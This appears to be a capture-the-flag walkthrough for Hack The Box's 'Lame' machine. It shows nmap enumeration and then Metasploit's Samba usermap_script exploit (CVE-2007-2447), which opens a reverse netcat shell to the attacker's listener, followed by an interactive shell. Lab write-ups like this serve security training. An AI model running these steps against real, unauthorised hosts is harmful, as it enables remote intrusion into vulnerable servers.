___ ___ _________ ________ |\ \|\ \|\___ ___\\ __ \ ___ \ \ \\\ \|___ \ \_\ \ \|\ /_|\__\ \ \ __ \ \ \ \ \ \ __ \|__| \ \ \ \ \ \ \ \ \ \ \|\ \ ___ \ \__\ \__\ \ \__\ \ \_______\|\__\ \|__|\|__| \|__| \|_______|\|__| ___ ________ _____ ______ _______ |\ \ |\ __ \|\ _ \ _ \|\ ___ \ \ \ \ \ \ \|\ \ \ \\\__\ \ \ \ __/| \ \ \ \ \ __ \ \ \\|__| \ \ \ \_|/__ \ \ \____\ \ \ \ \ \ \ \ \ \ \ \_|\ \ \ \_______\ \__\ \__\ \__\ \ \__\ \_______\ \|_______|\|__|\|__|\|__| \|__|\|_______|
Hack
The Box's Lame is an Easy machine that features the CVE-2007-2447
vulnerability which was first disclosed in 2007 and effected Samba 3.0.0 through 3.0.25rc3. You can learn more about this vulnerability's CVE details here.
Once starting the machine on HTB and connecting to your HTB VPN, we will start by opening our terminal and pinging the machine's IP address to make sure the network is up. Make sure the IP address you enter matches the one displayed on HTB when you boot up the target machine.
ping 10.129.136.4
You should receive responses from the IP address. You can press CTRL + C to stop sending packets to the target host. Once confirming the network is up and running, it's time to move to enumeration using Nmap.
Start by doing a quick service scan using Nmap. We will use the -sV switch to enable version detection. You can learn more about Nmap here. Note: I had to use the -Pn flag to skip host discovery in order to get proper scan results. You should receive the following output in your terminal:
nmap -sV -Pn 10.129.136.4 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-30 22:52 BST Nmap scan report for 10.129.136.4 Host is up (0.015s latency). Not shown: 996 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 17.58 seconds
On port 21 we can see that Vsftpd 2.3.4 is running. This is usually exploitable through a built-in backdoor, however it is not exploitable on this machine. Let's look at the Samba smdb service running on port 139. After doing some research, we find this service can be exploited using the "username map script" configuration option to run commands!
Open Metasploit in a new terminal by typing "msfconsole".
msfconsole ____________ [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%| `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%] [% .--------..-----.| |_ .---.-.| .,a$%|.-----.| |.-----.|__|| |_ %%] [% | || -__|| _|| _ || ,,aS$""` || _ || || _ || || _|%%] [% |__|__|__||_____||____||___._||%$P"` || __||__||_____||__||____|%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a, ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% `"$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] =[ metasploit v6.1.9-dev ] + -- --=[ 2169 exploits - 1149 auxiliary - 398 post ] + -- --=[ 592 payloads - 45 encoders - 10 nops ] + -- --=[ 9 evasion ] Metasploit tip: Save the current environment with the save command, future console restarts will use this environment again msf6 >
Let's search for Samba exploits using the "search" option.
search samba 3.0 Matching Modules ================ # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution 1 exploit/linux/samba/chain_reply 2010-06-16 good No Samba chain_reply Memory Corruption (Linux x86) 2 exploit/linux/samba/lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow 3 exploit/osx/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow 4 exploit/solaris/samba/lsa_transnames_heap 2007-05-14 average No Samba lsa_io_trans_names Heap Overflow Interact with a module by name or index. For example info 4, use 4 or use exploit/solaris/samba/lsa_transnames_heap
The exploit we are looking to use is the first one, exploit/multi/samba/usermap_script. To use an exploit we can type "use" and then the exploits assigned index # value from the search results.
Once the exploit has loaded, type "options" and hit Enter. This will bring up the exploits options which we will need to configure.
msf6 > use 0 [*] No payload configured, defaulting to cmd/unix/reverse_netcat msf6 exploit(multi/samba/usermap_script) > options Module options (exploit/multi/samba/usermap_script): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/ Using-Metasploit RPORT 139 yes The target port (TCP) Payload options (cmd/unix/reverse_netcat): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 147.182.150.190 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf6 exploit(multi/samba/usermap_script) >
Our RPORT is preconfigured to the correct port but our RHOSTS option is blank and is required to run the exploit. To set this we will need to type "set RHOSTS" then the IP of our target machine and hit Enter. We will see a confirmation line with the set RHOSTS IP.
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.129.136.4 RHOSTS => 10.129.136.4 msf6 exploit(multi/samba/usermap_script) >
You
may need to change your Payload options LHOST and LPORT if you are using
a VPN, Virtual Machine, or HTB PWNBOX. Most of the time, this can be
done just by entering "set LHOST" followed by your interface, usually "tun0". With everything all set, it's time to run the exploit! Type "run" then hit Enter.
msf6 exploit(multi/samba/usermap_script) > run [*] Started reverse TCP handler on 10.10.14.75:4444 [*] Command shell session 1 opened (10.10.14.75:4444 -> 10.129.136.4:34959) at 2022-04-30 23:20:35 +0100
Looks like we got a command shell session! Let's type "shell" to get an interactive shell.
shell [*] Trying to find binary 'python' on the target machine [*] Found python at /usr/bin/python [*] Using `python` to pop up an interactive shell [*] Trying to find binary 'bash' on the target machine [*] Found bash at /bin/bash
You can now
navigate through the target system to obtain the root and user .txt
flags using Linux commands.